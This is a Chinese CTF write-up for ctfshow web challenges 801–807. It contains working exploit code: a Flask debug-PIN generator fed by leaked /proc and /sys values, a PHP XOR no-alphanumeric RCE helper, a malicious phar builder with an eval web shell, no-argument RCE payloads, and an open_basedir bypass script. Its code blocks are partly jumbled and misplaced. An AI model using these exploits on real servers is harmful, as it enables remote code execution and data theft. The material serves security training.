ctfshow web入门 常见姿势 Web801-Web810

Web801(flask算PIN)

非预期解
/file?filename=/flag
预期解 计算pin码
/file?filename=/etc/passwd
发现能查看 说明是root
先查MAC地址
/file?filename=/sys/class/net/eth0/address
02:42:ac:0c:b1:e2
再查machine-id
/file?filename=/proc/sys/kernel/random/boot_id

/file?filename=/proc/self/cgroup

225374fa-04bc-4346-9f39-48fa82829ca9849ded351bf3457d3ba183f88102b90cabc7985317b3721f646e0e913a24fe8d

1. import hashlib
2. import getpass
3. from flask import Flask
4. from itertools import chain
5. import sys
6. import uuid
7. import typing as t
8. username='root'
9. app = Flask(__name__)
10. modname=getattr(app, "__module__", t.cast(object, app).__class__.__module__)
11. mod=sys.modules.get(modname)
12. mod = getattr(mod, "__file__", None)
14. probably_public_bits = [
15.     username, #用户名
16.     modname,  #一般固定为flask.app
17.     getattr(app, "__name__", app.__class__.__name__), #固定，一般为Flask
18.     '/usr/local/lib/python3.8/site-packages/flask/app.py',   #主程序（app.py）运行的绝对路径
19. ]
20. print(probably_public_bits)
21. mac ='02:42:ac:0c:b1:e2'.replace(':','')
22. mac=str(int(mac,base=16))
23. private_bits = [
24.    mac,#mac地址十进制
25. "225374fa-04bc-4346-9f39-48fa82829ca9849ded351bf3457d3ba183f88102b90cabc7985317b3721f646e0e913a24fe8d"
26.      ]
27. print(private_bits)
28. h = hashlib.sha1()
29. for bit in chain(probably_public_bits, private_bits):
30.     if not bit:
31.         continue
32.     if isinstance(bit, str):
33.         bit = bit.encode("utf-8")
34.     h.update(bit)
35. h.update(b"cookiesalt")
37. cookie_name = f"__wzd{h.hexdigest()[:20]}"
39. # If we need to generate a pin we salt it a bit more so that we don't
40. # end up with the same value and generate out 9 digits
41. h.update(b"pinsalt")
42. num = f"{int(h.hexdigest(), 16):09d}"[:9]
44. # Format the pincode in groups of digits for easier remembering if
45. # we don't have a result yet.
46. rv=None
47. if rv is None:
48.     for group_size in 5, 4, 3:
49.         if len(num) % group_size == 0:
50.             rv = "-".join(
51.                 num[x : x + group_size].rjust(group_size, "0")
52.                 for x in range(0, len(num), group_size)
53.             )
54.             break
55.     else:
56.         rv = num
58. print(rv)

复制代码

1. python3.8要用sha1 python3.6要用MD5

复制代码

1. #MD5
2. import hashlib
3. from itertools import chain
4. probably_public_bits = [
5.      'flaskweb'# username
6.      'flask.app',# modname
7.      'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
8.      '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
9. ]
11. private_bits = [
12.      '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
13.      '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
14. ]
16. h = hashlib.md5()
17. for bit in chain(probably_public_bits, private_bits):
18.     if not bit:
19.         continue
20.     if isinstance(bit, str):
21.         bit = bit.encode('utf-8')
22.     h.update(bit)
23. h.update(b'cookiesalt')
25. cookie_name = '__wzd' + h.hexdigest()[:20]
27. num = None
28. if num is None:
29.    h.update(b'pinsalt')
30.    num = ('%09d' % int(h.hexdigest(), 16))[:9]
32. rv =None
33. if rv is None:
34.    for group_size in 5, 4, 3:
35.        if len(num) % group_size == 0:
36.           rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
37.                       for x in range(0, len(num), group_size))
38.           break
39.        else:
40.           rv = num
42. print(rv)

复制代码

web802（无字母数字命令执行）

1. [/code][code]<?php
2. $myfile = fopen("C:\\Users\\26387\\Desktop\\rce.txt", "w");
3. $contents="";
4. for ($i=1; $i < 256; $i++) {
5.         for ($j=1; $j <256 ; $j++) {
7.                 if($i<16){
8.                         $hex_i='0'.dechex($i);
9.                 }
10.                 else{
11.                         $hex_i=dechex($i);
12.                 }
13.                 if($j<16){
14.                         $hex_j='0'.dechex($j);
15.                 }
16.                 else{
17.                         $hex_j=dechex($j);
18.                 }
19.                 $preg = '/[a-z]|[0-9]/i';
20.                 if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
21.                                         echo "";
22.             }
23.   
24.                 else{
25.                 $a='%'.$hex_i;
26.                 $b='%'.$hex_j;
27.                 $c=(urldecode($a)^urldecode($b));
28.                 if (ord($c)>=32&ord($c)<=126) {
29.                         $contents=$contents.$c." ".$a." ".$b."\n";
30.                 }
31.         }
33. }
34. }
35. fwrite($myfile,$contents);
36. fclose($myfile);?>

复制代码

Web803（phar文件包含）

1. [/code][align=center] [/align]
2. 接着上传文件
3. [code]<?php
5. # -*- coding: utf-8 -*-
6. # @Author: h1xa
7. # @Date:   2022-03-19 12:10:55
8. # @Last Modified by:   h1xa
9. # @Last Modified time: 2022-03-19 13:27:18
10. # @email: h1xa@ctfer.com
11. # @link: https://ctfer.com
14. error_reporting(0);
15. highlight_file(__FILE__);
16. $file = $_POST['file'];
17. $content = $_POST['content'];
19. if(isset($content) && !preg_match('/php|data|ftp/i',$file)){
20.     if(file_exists($file.'.txt')){
21.         include $file.'.txt';
22.     }else{
23.         file_put_contents($file,$content);
24.     }
25. }

复制代码

Web804（phar反序列化）

1. [/code][无参RCE攻防技巧-CSDN博客](https://blog.csdn.net/qq_45570082/article/details/106602261)
2. [b]利用session_id[/b]
3. [code]import requests
4. url="http://6eda48f3-8082-442d-8823-c1cc2d7a2cdf.challenge.ctf.show/"
5. data1={'file':'/tmp/a.phar','content':open('C:\\Users\\26387\\Desktop\\shell.phar','rb').read()}
6. data2={'file':'phar:///tmp/a.phar/a','content':'123','1':'system("cat f*");'}
7. requests.post(url,data=data1)
8. r=requests.post(url,data=data2)
9. print(r.text)

复制代码

但是发现session已存活

无法改变Session_id，此方法失败。
利用get_defined_vars ()函数
get_defined_vars()：返回由所有已定义变量所组成的数组
而get_defined_vars()返回的又是一个数组，我们能够通过php的一系列数组函数读取到该数组中任意我们想要的值

1. <?php
3. # -*- coding: utf-8 -*-
4. # @Author: h1xa
5. # @Date:   2022-03-19 12:10:55
6. # @Last Modified by:   h1xa
7. # @Last Modified time: 2022-03-19 13:27:18
8. # @email: h1xa@ctfer.com
9. # @link: https://ctfer.com
12. error_reporting(0);
13. highlight_file(__FILE__);
15. class hacker{
16.     public $code;
17.     public function __destruct(){
18.         eval($this->code);
19.     }
20. }
22. $file = $_POST['file'];
23. $content = $_POST['content'];
25. if(isset($content) && !preg_match('/php|data|ftp/i',$file)){
26.     if(file_exists($file)){
27.         unlink($file);
28.     }else{
29.         file_put_contents($file,$content);
30.     }
31. }

复制代码

我们先current定位第一个get

1. <?php
2. class hacker{
3.     public $code;
4.     public function __destruct(){
5.         eval($this->code);
6.     }
7. }
8. $a=new hacker();
9. $a->code="system('cat f*');";
10. $phar = new Phar("shell.phar");
11. $phar->startBuffering();
12. $phar->setMetadata($a);
13. $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
14. $phar->addFromString("a.txt", "<?php eval(\$_POST[1]);?>");
15. $phar->stopBuffering();
16. ?>

复制代码

对于next() end()等函数我们可以举例子利用看看

这里我们就用end()了

1. import requests  
2. url="http://438d535d-6030-47bf-964d-f1054ab03155.challenge.ctf.show/"
3. data1={'file':'/tmp/a.phar','content':open('C:\\Users\\26387\\Desktop\\shell.phar','rb').read()}
4. data2={'file':'phar:///tmp/a.phar','content':'123'}
5. requests.post(url,data=data1)
6. r=requests.post(url,data=data2)
7. print(r.text)

复制代码

发现可以显示"1"，那我们只需要前面套个eval进行命令执行

1. <?php
2. error_reporting(0);
3. highlight_file(__FILE__);
4. eval($_POST[1]);

复制代码

或者

1. <?php
2. $c = "glob:///*";
3. $a = new DirectoryIterator($c);
4. foreach($a as $f){
5.     echo($f->__toString().'
   
6. ');
7. }
8. ?>

复制代码

利用getallheaders()
getallheaders返回当前请求的所有请求头信息

我这里注入点用的是UA头

1. <?php
2. $a = $_GET['c'];
3. if ( $b = opendir($a) ) {
4.     while ( ($file = readdir($b)) !== false ) {
5.         echo $file."
   
6. ";
7.     }
8.     closedir($b);
9. }
10. ?>

复制代码

利用scandir()函数
获取当前目录文件

1. <?php
2. /*
3. * by phithon
4. * From https://www.leavesongs.com
5. * detail: http://cxsecurity.com/issue/WLB-2009110068
6. */
7. header('content-type: text/plain');
8. error_reporting(-1);
9. ini_set('display_errors', TRUE);
10. printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());
11. printf("disable_functions: %s\n", ini_get('disable_functions'));
12. $file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');
13. $relat_file = getRelativePath(__FILE__, $file);
14. $paths = explode('/', $file);
15. $name = mt_rand() % 999;
16. $exp = getRandStr();
17. mkdir($name);
18. chdir($name);
19. for($i = 1 ; $i < count($paths) - 1 ; $i++){
20.     mkdir($paths[$i]);
21.     chdir($paths[$i]);
22. }
23. mkdir($paths[$i]);
24. for ($i -= 1; $i > 0; $i--) {
25.     chdir('..');
26. }
27. $paths = explode('/', $relat_file);
28. $j = 0;
29. for ($i = 0; $paths[$i] == '..'; $i++) {
30.     mkdir($name);
31.     chdir($name);
32.     $j++;
33. }
34. for ($i = 0; $i <= $j; $i++) {
35.     chdir('..');
36. }
37. $tmp = array_fill(0, $j + 1, $name);
38. symlink(implode('/', $tmp), 'tmplink');
39. $tmp = array_fill(0, $j, '..');
40. symlink('tmplink/' . implode('/', $tmp) . $file, $exp);
41. unlink('tmplink');
42. mkdir('tmplink');
43. delfile($name);
44. $exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";
45. $exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";
46. echo "\n-----------------content---------------\n\n";
47. echo file_get_contents($exp);
48. delfile('tmplink');
50. function getRelativePath($from, $to) {
51.   // some compatibility fixes for Windows paths
52.   $from = rtrim($from, '\/') . '/';
53.   $from = str_replace('\\', '/', $from);
54.   $to   = str_replace('\\', '/', $to);
56.   $from   = explode('/', $from);
57.   $to     = explode('/', $to);
58.   $relPath  = $to;
60.   foreach($from as $depth => $dir) {
61.     // find first non-matching dir
62.     if($dir === $to[$depth]) {
63.       // ignore this directory
64.       array_shift($relPath);
65.     } else {
66.       // get number of remaining dirs to $from
67.       $remaining = count($from) - $depth;
68.       if($remaining > 1) {
69.         // add traversals up to first matching dir
70.         $padLength = (count($relPath) + $remaining - 1) * -1;
71.         $relPath = array_pad($relPath, $padLength, '..');
72.         break;
73.       } else {
74.         $relPath[0] = './' . $relPath[0];
75.       }
76.     }
77.   }
78.   return implode('/', $relPath);
79. }
81. function delfile($deldir){
82.     if (@is_file($deldir)) {
83.         @chmod($deldir,0777);
84.         return @unlink($deldir);
85.     }else if(@is_dir($deldir)){
86.         if(($mydir = @opendir($deldir)) == NULL) return false;
87.         while(false !== ($file = @readdir($mydir)))
88.         {
89.             $name = File_Str($deldir.'/'.$file);
90.             if(($file!='.') && ($file!='..')){delfile($name);}
91.         }
92.         @closedir($mydir);
93.         @chmod($deldir,0777);
94.         return @rmdir($deldir) ? true : false;
95.     }
96. }
98. function File_Str($string)
99. {
100.     return str_replace('//','/',str_replace('\\','/',$string));
101. }
103. function getRandStr($length = 6) {
104.     $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
105.     $randStr = '';
106.     for ($i = 0; $i < $length; $i++) {
107.         $randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
108.     }
109.     return $randStr;
110. }

复制代码

获取上级目录文件

1. <?php
3. # -*- coding: utf-8 -*-
4. # @Author: h1xa
5. # @Date:   2022-03-19 12:10:55
6. # @Last Modified by:   h1xa
7. # @Last Modified time: 2022-03-19 13:27:18
8. # @email: h1xa@ctfer.com
9. # @link: https://ctfer.com
11. highlight_file(__FILE__);
13. if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {   
14.     eval($_GET['code']);
15. }
16. ?>

复制代码

1. /?code=eval(hex2bin(session_id(session_start())));

复制代码

1. end() - 将内部指针指向数组中的最后一个元素，并输出。
2. next() - 将内部指针指向数组中的下一个元素，并输出。
3. prev() - 将内部指针指向数组中的上一个元素，并输出。
4. reset() - 将内部指针指向数组中的第一个元素，并输出。
5. each() - 返回当前元素的键名和键值，并将内部指针向前移动。

复制代码

经过测试 发现能读取当前目录的文件内容，但是读不到根目录的内容（可能是我太菜了呜呜呜，有知道的师傅可以私信T我一下）
Web807（反弹shell）

[code]